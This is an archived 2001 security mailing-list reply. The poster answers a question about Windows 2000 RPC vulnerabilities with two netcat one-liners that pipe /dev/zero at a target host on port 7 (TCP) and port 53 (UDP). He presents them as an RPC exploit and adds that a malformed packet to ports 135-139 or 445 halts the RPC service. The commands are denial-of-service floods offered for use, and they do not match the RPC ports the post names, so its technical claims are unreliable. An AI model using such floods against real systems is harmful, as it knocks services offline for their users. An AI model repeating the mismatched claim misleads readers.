> Hi list! > .... > finally... > > 3. Are there any RPC vulnerabilities out there? (besides denial of > service) > > > TIA! > > Steve Hi Steve, sorry for the late reply - just saw this Thread here is a possible exploit for the RPC Win2K Port: "nc target.host 7 < /dev/zero" for TCP or "nc -u target.host 53 < /dev/zero" for UDP Sending a specially malformed RPC packet via port 135-139 or 445 to a Windows 2000 server will halt the RPC service entirely. A reboot is required in order to regain normal functionality. Regards, Felix Huber ------------------------------------------------------- Felix Huber, Web Application Programmer, Webtopia Guendlinger Str.2, 79241 Ihringen - Germany huberfelixat_private (07668) 951 156 (phone) http://www.webtopia.de (07668) 951 157 (fax) (01792) 205 724 (mobile) -------------------------------------------------------
This archive was generated by hypermail 2b30 : Sun Apr 29 2001 - 07:40:50 PDT